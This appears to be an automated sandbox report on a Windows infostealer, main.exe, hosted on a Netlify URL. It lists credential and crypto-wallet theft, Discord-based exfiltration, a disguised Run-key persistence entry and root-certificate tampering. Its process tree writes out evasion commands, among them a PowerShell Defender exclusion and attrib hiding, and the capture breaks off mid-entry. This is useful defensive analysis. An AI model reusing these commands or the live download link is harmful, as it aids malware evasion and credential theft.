hxxps://chic-melomakarona-c1425a[.]netlify[.]app/main[.]exe

Analysis

max time kernel
25s
max time network
22s
platform
windows10-2004_x64
resource
win10v2004-20240426-en
resource tags

arch:x64arch:x86image:win10v2004-20240426-enlocale:en-usos:windows10-2004-x64system
submitted
30-05-2024 21:01

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

https://chic-melomakarona-c1425a.netlify.app/main.exe

Score

8^/10

execution persistence spyware stealer

Malware Config

Signatures

Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
6124	powershell.exe
5312	powershell.exe

Drops file in Drivers directory 3 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\drivers\etc\hosts	main.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	attrib.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	attrib.exe

Executes dropped EXE 1 IoCs

pid	Process
4312	main.exe

Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Realtek HD Audio Universal Service = "C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\Protect\\SecurityHealthSystray.exe"	main.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
38	discord.com
41	discord.com

Looks up external IP address via web service 3 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
36	ip-api.com
34	api.ipify.org
35	api.ipify.org

Maps connected drives based on registry 3 TTPs 2 IoCs

Disk information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum	main.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum\0	main.exe

Detects videocard installed 1 TTPs 2 IoCs

Uses WMIC.exe to determine videocard installed.

System Information Discovery

T1082

pid	Process
5804	wmic.exe
5232	wmic.exe

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe

GoLang User-Agent 1 IoCs

Uses default user-agent string defined by GoLang HTTP packages.

description	flow	ioc
HTTP User-Agent header	37	Go-http-client/1.1

Modifies system certificate store 2 TTPs 3 IoCs

evasion spyware trojan

Install Root Certificate

T1553.004

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\B1BC968BD4F49D622AA89A81F2150152A41D829C	main.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\B1BC968BD4F49D622AA89A81F2150152A41D829C\Blob = 0400000001000000100000003e455215095192e1b75d379fb187298a0f00000001000000140000005a6d07b6371d966a2fb6ba92828ce5512a49513d090000000100000068000000306606082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050508020206082b0601050507030606082b0601050507030706082b0601050507030906082b0601050507030106082b06010505070308530000000100000040000000303e301f06092b06010401a032010130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c00b000000010000003000000047006c006f00620061006c005300690067006e00200052006f006f00740020004300410020002d002000520031000000620000000100000020000000ebd41040e4bb3ec742c9e381d31ef2a41a48b6685c96e7cef3c1df6cd4331c99140000000100000014000000607b661a450d97ca89502f7d04cd34a8fffcfd4b1d00000001000000100000006ee7f3b060d10e90a31ba3471b9992367f000000010000000c000000300a06082b060105050703097a000000010000000c000000300a06082b060105050703097e00000001000000080000000000042beb77d501030000000100000014000000b1bc968bd4f49d622aa89a81f2150152a41d829c190000000100000010000000a823b4a20180beb460cab955c24d7e21200000000100000079030000308203753082025da003020102020b040000000001154b5ac394300d06092a864886f70d01010505003057310b300906035504061302424531193017060355040a1310476c6f62616c5369676e206e762d73613110300e060355040b1307526f6f74204341311b301906035504031312476c6f62616c5369676e20526f6f74204341301e170d3938303930313132303030305a170d3238303132383132303030305a3057310b300906035504061302424531193017060355040a1310476c6f62616c5369676e206e762d73613110300e060355040b1307526f6f74204341311b301906035504031312476c6f62616c5369676e20526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100da0ee6998dcea3e34f8a7efbf18b83256bea481ff12ab0b9951104bdf063d1e26766cf1cddcf1b482bee8d898e9aaf298065abe9c72d12cbab1c4c7007a13d0a30cd158d4ff8ddd48c50151cef50eec42ef7fce952f2917de06dd535308e5e4373f241e9d56ae3b2893a5639386f063c88695b2a4dc5a754b86c89cc9bf93ccae5fd89f5123c927896d6dc746e934461d18dc746b2750e86e8198ad56d6cd5781695a2e9c80a38ebf224134f73549313853a1bbc1e34b58b058cb9778bb1db1f2091ab09536e90ce7b3774b97047912251631679aeb1ae412608c8192bd146aa48d6642ad78334ff2c2ac16c19434a0785e7d37cf62168efeaf2529f7f9390cf0203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e04160414607b661a450d97ca89502f7d04cd34a8fffcfd4b300d06092a864886f70d01010505000382010100d673e77c4f76d08dbfecbaa2be34c52832b57cfc6c9c2c2bbd099e53bf6b5eaa1148b6e508a3b3ca3d614dd34609b33ec3a0e363551bf2baefad39e143b938a3e62f8a263befa05056f9c60afd38cdc40b705194979804dfc35f94d515c914419cc45d7564150dff5530ec868fff0def2cb96346f6aafcdfbc69fd2e1248649ae095f0a6ef298f01b115b50c1da5fe692c6924781eb3a71c7162eecac897ac175d8ac2f847866e2ac4563195d06789852bf96ca65d469d0caa82e49951dd70b7db563d61e46ae15cd6f6fe3dde41cc07ae6352bf5353f42be9c7fdb6f7825f85d24118db81b3041cc51fa4806f1520c9de0c880a1dd66655e2fc48c9292669e0	main.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\B1BC968BD4F49D622AA89A81F2150152A41D829C\Blob = 5c000000010000000400000000080000190000000100000010000000a823b4a20180beb460cab955c24d7e21030000000100000014000000b1bc968bd4f49d622aa89a81f2150152a41d829c7e00000001000000080000000000042beb77d5017a000000010000000c000000300a06082b060105050703097f000000010000000c000000300a06082b060105050703091d00000001000000100000006ee7f3b060d10e90a31ba3471b999236140000000100000014000000607b661a450d97ca89502f7d04cd34a8fffcfd4b620000000100000020000000ebd41040e4bb3ec742c9e381d31ef2a41a48b6685c96e7cef3c1df6cd4331c990b000000010000003000000047006c006f00620061006c005300690067006e00200052006f006f00740020004300410020002d002000520031000000530000000100000040000000303e301f06092b06010401a032010130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000068000000306606082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050508020206082b0601050507030606082b0601050507030706082b0601050507030906082b0601050507030106082b060105050703080f00000001000000140000005a6d07b6371d966a2fb6ba92828ce5512a49513d0400000001000000100000003e455215095192e1b75d379fb187298a200000000100000079030000308203753082025da003020102020b040000000001154b5ac394300d06092a864886f70d01010505003057310b300906035504061302424531193017060355040a1310476c6f62616c5369676e206e762d73613110300e060355040b1307526f6f74204341311b301906035504031312476c6f62616c5369676e20526f6f74204341301e170d3938303930313132303030305a170d3238303132383132303030305a3057310b300906035504061302424531193017060355040a1310476c6f62616c5369676e206e762d73613110300e060355040b1307526f6f74204341311b301906035504031312476c6f62616c5369676e20526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100da0ee6998dcea3e34f8a7efbf18b83256bea481ff12ab0b9951104bdf063d1e26766cf1cddcf1b482bee8d898e9aaf298065abe9c72d12cbab1c4c7007a13d0a30cd158d4ff8ddd48c50151cef50eec42ef7fce952f2917de06dd535308e5e4373f241e9d56ae3b2893a5639386f063c88695b2a4dc5a754b86c89cc9bf93ccae5fd89f5123c927896d6dc746e934461d18dc746b2750e86e8198ad56d6cd5781695a2e9c80a38ebf224134f73549313853a1bbc1e34b58b058cb9778bb1db1f2091ab09536e90ce7b3774b97047912251631679aeb1ae412608c8192bd146aa48d6642ad78334ff2c2ac16c19434a0785e7d37cf62168efeaf2529f7f9390cf0203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e04160414607b661a450d97ca89502f7d04cd34a8fffcfd4b300d06092a864886f70d01010505000382010100d673e77c4f76d08dbfecbaa2be34c52832b57cfc6c9c2c2bbd099e53bf6b5eaa1148b6e508a3b3ca3d614dd34609b33ec3a0e363551bf2baefad39e143b938a3e62f8a263befa05056f9c60afd38cdc40b705194979804dfc35f94d515c914419cc45d7564150dff5530ec868fff0def2cb96346f6aafcdfbc69fd2e1248649ae095f0a6ef298f01b115b50c1da5fe692c6924781eb3a71c7162eecac897ac175d8ac2f847866e2ac4563195d06789852bf96ca65d469d0caa82e49951dd70b7db563d61e46ae15cd6f6fe3dde41cc07ae6352bf5353f42be9c7fdb6f7825f85d24118db81b3041cc51fa4806f1520c9de0c880a1dd66655e2fc48c9292669e0	main.exe

NTFS ADS 1 IoCs

description	ioc	Process
File opened for modification	C:\Users\Admin\Downloads\Unconfirmed 18658.crdownload:SmartScreen	msedge.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
1488	msedge.exe
1488	msedge.exe
4168	msedge.exe
4168	msedge.exe
4516	identity_helper.exe
4516	identity_helper.exe
4420	msedge.exe
4420	msedge.exe
4312	main.exe
4312	main.exe
4312	main.exe
4312	main.exe
4312	main.exe
4312	main.exe
4312	main.exe
4312	main.exe
4312	main.exe
4312	main.exe
5312	powershell.exe
5312	powershell.exe
5312	powershell.exe
4312	main.exe
4312	main.exe
4312	main.exe
4312	main.exe
4312	main.exe
4312	main.exe
4312	main.exe
4312	main.exe
5620	powershell.exe
5620	powershell.exe
4312	main.exe
4312	main.exe
4312	main.exe
5620	powershell.exe
4312	main.exe
4312	main.exe
4312	main.exe
4312	main.exe
4312	main.exe
4312	main.exe
4312	main.exe
4312	main.exe
4312	main.exe
4312	main.exe
4312	main.exe
4312	main.exe
4312	main.exe
4312	main.exe
4312	main.exe
4312	main.exe
4312	main.exe
4312	main.exe
4312	main.exe
4312	main.exe
4312	main.exe
4312	main.exe
4312	main.exe
4312	main.exe
4312	main.exe
4312	main.exe
4312	main.exe
4312	main.exe
4312	main.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 7 IoCs

pid	Process
4168	msedge.exe
4168	msedge.exe
4168	msedge.exe
4168	msedge.exe
4168	msedge.exe
4168	msedge.exe
4168	msedge.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	4312	main.exe
Token: SeIncreaseQuotaPrivilege	5140	wmic.exe
Token: SeSecurityPrivilege	5140	wmic.exe
Token: SeTakeOwnershipPrivilege	5140	wmic.exe
Token: SeLoadDriverPrivilege	5140	wmic.exe
Token: SeSystemProfilePrivilege	5140	wmic.exe
Token: SeSystemtimePrivilege	5140	wmic.exe
Token: SeProfSingleProcessPrivilege	5140	wmic.exe
Token: SeIncBasePriorityPrivilege	5140	wmic.exe
Token: SeCreatePagefilePrivilege	5140	wmic.exe
Token: SeBackupPrivilege	5140	wmic.exe
Token: SeRestorePrivilege	5140	wmic.exe
Token: SeShutdownPrivilege	5140	wmic.exe
Token: SeDebugPrivilege	5140	wmic.exe
Token: SeSystemEnvironmentPrivilege	5140	wmic.exe
Token: SeRemoteShutdownPrivilege	5140	wmic.exe
Token: SeUndockPrivilege	5140	wmic.exe
Token: SeManageVolumePrivilege	5140	wmic.exe
Token: 33	5140	wmic.exe
Token: 34	5140	wmic.exe
Token: 35	5140	wmic.exe
Token: 36	5140	wmic.exe
Token: SeIncreaseQuotaPrivilege	5140	wmic.exe
Token: SeSecurityPrivilege	5140	wmic.exe
Token: SeTakeOwnershipPrivilege	5140	wmic.exe
Token: SeLoadDriverPrivilege	5140	wmic.exe
Token: SeSystemProfilePrivilege	5140	wmic.exe
Token: SeSystemtimePrivilege	5140	wmic.exe
Token: SeProfSingleProcessPrivilege	5140	wmic.exe
Token: SeIncBasePriorityPrivilege	5140	wmic.exe
Token: SeCreatePagefilePrivilege	5140	wmic.exe
Token: SeBackupPrivilege	5140	wmic.exe
Token: SeRestorePrivilege	5140	wmic.exe
Token: SeShutdownPrivilege	5140	wmic.exe
Token: SeDebugPrivilege	5140	wmic.exe
Token: SeSystemEnvironmentPrivilege	5140	wmic.exe
Token: SeRemoteShutdownPrivilege	5140	wmic.exe
Token: SeUndockPrivilege	5140	wmic.exe
Token: SeManageVolumePrivilege	5140	wmic.exe
Token: 33	5140	wmic.exe
Token: 34	5140	wmic.exe
Token: 35	5140	wmic.exe
Token: 36	5140	wmic.exe
Token: SeIncreaseQuotaPrivilege	5232	wmic.exe
Token: SeSecurityPrivilege	5232	wmic.exe
Token: SeTakeOwnershipPrivilege	5232	wmic.exe
Token: SeLoadDriverPrivilege	5232	wmic.exe
Token: SeSystemProfilePrivilege	5232	wmic.exe
Token: SeSystemtimePrivilege	5232	wmic.exe
Token: SeProfSingleProcessPrivilege	5232	wmic.exe
Token: SeIncBasePriorityPrivilege	5232	wmic.exe
Token: SeCreatePagefilePrivilege	5232	wmic.exe
Token: SeBackupPrivilege	5232	wmic.exe
Token: SeRestorePrivilege	5232	wmic.exe
Token: SeShutdownPrivilege	5232	wmic.exe
Token: SeDebugPrivilege	5232	wmic.exe
Token: SeSystemEnvironmentPrivilege	5232	wmic.exe
Token: SeRemoteShutdownPrivilege	5232	wmic.exe
Token: SeUndockPrivilege	5232	wmic.exe
Token: SeManageVolumePrivilege	5232	wmic.exe
Token: 33	5232	wmic.exe
Token: 34	5232	wmic.exe
Token: 35	5232	wmic.exe
Token: 36	5232	wmic.exe

Suspicious use of FindShellTrayWindow 47 IoCs

pid	Process
4168	msedge.exe
4168	msedge.exe
4168	msedge.exe
4168	msedge.exe
4168	msedge.exe
4168	msedge.exe
4168	msedge.exe
4168	msedge.exe
4168	msedge.exe
4168	msedge.exe
4168	msedge.exe
4168	msedge.exe
4168	msedge.exe
4168	msedge.exe
4168	msedge.exe
4168	msedge.exe
4168	msedge.exe
4168	msedge.exe
4168	msedge.exe
4168	msedge.exe
4168	msedge.exe
4168	msedge.exe
4168	msedge.exe
4168	msedge.exe
4168	msedge.exe
4168	msedge.exe
4168	msedge.exe
4168	msedge.exe
4168	msedge.exe
4168	msedge.exe
4168	msedge.exe
4168	msedge.exe
4168	msedge.exe
4168	msedge.exe
4168	msedge.exe
4168	msedge.exe
4168	msedge.exe
4168	msedge.exe
4168	msedge.exe
4168	msedge.exe
4168	msedge.exe
4168	msedge.exe
4168	msedge.exe
4168	msedge.exe
4168	msedge.exe
4168	msedge.exe
4168	msedge.exe

Suspicious use of SendNotifyMessage 24 IoCs

pid	Process
4168	msedge.exe
4168	msedge.exe
4168	msedge.exe
4168	msedge.exe
4168	msedge.exe
4168	msedge.exe
4168	msedge.exe
4168	msedge.exe
4168	msedge.exe
4168	msedge.exe
4168	msedge.exe
4168	msedge.exe
4168	msedge.exe
4168	msedge.exe
4168	msedge.exe
4168	msedge.exe
4168	msedge.exe
4168	msedge.exe
4168	msedge.exe
4168	msedge.exe
4168	msedge.exe
4168	msedge.exe
4168	msedge.exe
4168	msedge.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 4168 wrote to memory of 4752	4168	msedge.exe	84
PID 4168 wrote to memory of 4752	4168	msedge.exe	84
PID 4168 wrote to memory of 2384	4168	msedge.exe	86
PID 4168 wrote to memory of 2384	4168	msedge.exe	86
PID 4168 wrote to memory of 2384	4168	msedge.exe	86
PID 4168 wrote to memory of 2384	4168	msedge.exe	86
PID 4168 wrote to memory of 2384	4168	msedge.exe	86
PID 4168 wrote to memory of 2384	4168	msedge.exe	86
PID 4168 wrote to memory of 2384	4168	msedge.exe	86
PID 4168 wrote to memory of 2384	4168	msedge.exe	86
PID 4168 wrote to memory of 2384	4168	msedge.exe	86
PID 4168 wrote to memory of 2384	4168	msedge.exe	86
PID 4168 wrote to memory of 2384	4168	msedge.exe	86
PID 4168 wrote to memory of 2384	4168	msedge.exe	86
PID 4168 wrote to memory of 2384	4168	msedge.exe	86
PID 4168 wrote to memory of 2384	4168	msedge.exe	86
PID 4168 wrote to memory of 2384	4168	msedge.exe	86
PID 4168 wrote to memory of 2384	4168	msedge.exe	86
PID 4168 wrote to memory of 2384	4168	msedge.exe	86
PID 4168 wrote to memory of 2384	4168	msedge.exe	86
PID 4168 wrote to memory of 2384	4168	msedge.exe	86
PID 4168 wrote to memory of 2384	4168	msedge.exe	86
PID 4168 wrote to memory of 2384	4168	msedge.exe	86
PID 4168 wrote to memory of 2384	4168	msedge.exe	86
PID 4168 wrote to memory of 2384	4168	msedge.exe	86
PID 4168 wrote to memory of 2384	4168	msedge.exe	86
PID 4168 wrote to memory of 2384	4168	msedge.exe	86
PID 4168 wrote to memory of 2384	4168	msedge.exe	86
PID 4168 wrote to memory of 2384	4168	msedge.exe	86
PID 4168 wrote to memory of 2384	4168	msedge.exe	86
PID 4168 wrote to memory of 2384	4168	msedge.exe	86
PID 4168 wrote to memory of 2384	4168	msedge.exe	86
PID 4168 wrote to memory of 2384	4168	msedge.exe	86
PID 4168 wrote to memory of 2384	4168	msedge.exe	86
PID 4168 wrote to memory of 2384	4168	msedge.exe	86
PID 4168 wrote to memory of 2384	4168	msedge.exe	86
PID 4168 wrote to memory of 2384	4168	msedge.exe	86
PID 4168 wrote to memory of 2384	4168	msedge.exe	86
PID 4168 wrote to memory of 2384	4168	msedge.exe	86
PID 4168 wrote to memory of 2384	4168	msedge.exe	86
PID 4168 wrote to memory of 2384	4168	msedge.exe	86
PID 4168 wrote to memory of 2384	4168	msedge.exe	86
PID 4168 wrote to memory of 1488	4168	msedge.exe	87
PID 4168 wrote to memory of 1488	4168	msedge.exe	87
PID 4168 wrote to memory of 4596	4168	msedge.exe	88
PID 4168 wrote to memory of 4596	4168	msedge.exe	88
PID 4168 wrote to memory of 4596	4168	msedge.exe	88
PID 4168 wrote to memory of 4596	4168	msedge.exe	88
PID 4168 wrote to memory of 4596	4168	msedge.exe	88
PID 4168 wrote to memory of 4596	4168	msedge.exe	88
PID 4168 wrote to memory of 4596	4168	msedge.exe	88
PID 4168 wrote to memory of 4596	4168	msedge.exe	88
PID 4168 wrote to memory of 4596	4168	msedge.exe	88
PID 4168 wrote to memory of 4596	4168	msedge.exe	88
PID 4168 wrote to memory of 4596	4168	msedge.exe	88
PID 4168 wrote to memory of 4596	4168	msedge.exe	88
PID 4168 wrote to memory of 4596	4168	msedge.exe	88
PID 4168 wrote to memory of 4596	4168	msedge.exe	88
PID 4168 wrote to memory of 4596	4168	msedge.exe	88
PID 4168 wrote to memory of 4596	4168	msedge.exe	88
PID 4168 wrote to memory of 4596	4168	msedge.exe	88
PID 4168 wrote to memory of 4596	4168	msedge.exe	88
PID 4168 wrote to memory of 4596	4168	msedge.exe	88
PID 4168 wrote to memory of 4596	4168	msedge.exe	88

Views/modifies file attributes 1 TTPs 4 IoCs

evasion

Hidden Files and Directories

T1564.001

pid	Process
2564	attrib.exe
4604	attrib.exe
5908	attrib.exe
5996	attrib.exe

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://chic-melomakarona-c1425a.netlify.app/main.exe
1⤵
- Enumerates system info in registry
- NTFS ADS
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:4168
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xe0,0x108,0x7ffd329346f8,0x7ffd32934708,0x7ffd32934718
  2⤵
  PID:4752
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1816,8192159604872759279,14026891043894723930,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2040 /prefetch:2
  2⤵
  PID:2384
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1816,8192159604872759279,14026891043894723930,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2324 /prefetch:3
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:1488
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1816,8192159604872759279,14026891043894723930,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3084 /prefetch:8
  2⤵
  PID:4596
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1816,8192159604872759279,14026891043894723930,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3380 /prefetch:1
  2⤵
  PID:3692
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1816,8192159604872759279,14026891043894723930,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3408 /prefetch:1
  2⤵
  PID:4436
- C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1816,8192159604872759279,14026891043894723930,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4980 /prefetch:8
  2⤵
  PID:3036
- C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1816,8192159604872759279,14026891043894723930,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4980 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:4516
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1816,8192159604872759279,14026891043894723930,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5360 /prefetch:1
  2⤵
  PID:4592
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1816,8192159604872759279,14026891043894723930,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5396 /prefetch:1
  2⤵
  PID:968
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=1816,8192159604872759279,14026891043894723930,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=5208 /prefetch:8
  2⤵
  PID:4280
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1816,8192159604872759279,14026891043894723930,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5628 /prefetch:1
  2⤵
  PID:3960
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1816,8192159604872759279,14026891043894723930,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5956 /prefetch:1
  2⤵
  PID:3584
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1816,8192159604872759279,14026891043894723930,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5984 /prefetch:1
  2⤵
  PID:5076
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=1816,8192159604872759279,14026891043894723930,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=6284 /prefetch:8
  2⤵
  PID:4348
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1816,8192159604872759279,14026891043894723930,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6336 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:4420
- C:\Users\Admin\Downloads\main.exe
  "C:\Users\Admin\Downloads\main.exe"
  2⤵
  - Drops file in Drivers directory
  - Executes dropped EXE
  - Adds Run key to start application
  - Maps connected drives based on registry
  - Modifies system certificate store
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:4312
- - C:\Windows\system32\attrib.exe
    attrib +h +s C:\Users\Admin\Downloads\main.exe
    3⤵
    - Views/modifies file attributes
    PID:2564
- - C:\Windows\system32\attrib.exe
    attrib +h +s C:\Users\Admin\AppData\Roaming\Microsoft\Protect\SecurityHealthSystray.exe
    3⤵
    - Views/modifies file attributes
    PID:4604
- - C:\Windows\System32\Wbem\wmic.exe
    wmic csproduct get UUID
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:5140
- - C:\Windows\System32\Wbem\wmic.exe
    wmic path win32_VideoController get name
    3⤵
    - Detects videocard installed
    - Suspicious use of AdjustPrivilegeToken
    PID:5232
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -Command Add-MpPreference -ExclusionPath C:\Users\Admin\Downloads\main.exe
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    PID:5312
- - C:\Windows\System32\Wbem\wmic.exe
    wmic os get Caption
    3⤵
    PID:5384
- - C:\Windows\System32\Wbem\wmic.exe
    wmic cpu get Name
    3⤵
    PID:5584
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
